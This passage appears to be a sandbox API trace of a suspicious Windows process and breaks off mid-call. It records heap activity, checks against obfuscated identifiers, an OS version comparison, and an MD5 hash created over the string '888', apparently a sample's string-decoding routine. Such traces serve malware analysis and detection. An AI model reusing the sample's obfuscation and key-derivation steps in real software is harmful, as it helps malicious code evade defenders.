RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0205.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0205.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0205.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0205.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0205.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0205.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0205.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0205.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0205.637] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0205.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0205.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0205.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0205.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0205.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0205.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0205.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0205.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0205.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0205.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0205.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0205.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0205.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0205.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0205.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0205.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0205.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0205.638] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0205.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0205.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0205.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0205.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0205.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0205.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.639] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0205.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.639] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0205.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0205.639] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0205.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0205.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0205.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72378 [0205.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0205.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0205.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0205.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa38 [0205.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0205.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0205.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0205.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0205.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0205.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0205.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0205.639] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0205.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0205.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0205.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0205.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0205.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0205.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0205.640] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0205.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0205.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0205.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0205.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0205.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0205.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0205.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.640] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0205.640] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0205.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0205.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0205.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.641] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0205.641] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0205.641] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0205.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.641] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0205.642] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0205.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.642] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.642] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0205.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0205.642] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0205.643] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0205.643] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0205.643] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0205.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0205.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0205.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0205.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7100, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0205.644] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c000) returned 1 [0205.645] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.645] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.645] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0205.645] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.645] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0205.645] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.645] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0205.645] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0205.645] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0205.645] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0205.645] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0205.645] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0205.645] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.645] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.645] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0205.645] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0205.645] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.645] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.646] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0205.646] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0205.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0205.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaacc0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0205.646] CryptCreateHash (in: hProv=0xa7c000, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0205.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0205.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0205.646] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0205.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0205.646] WideCharToMultiByte (in: CodePage=0x0, 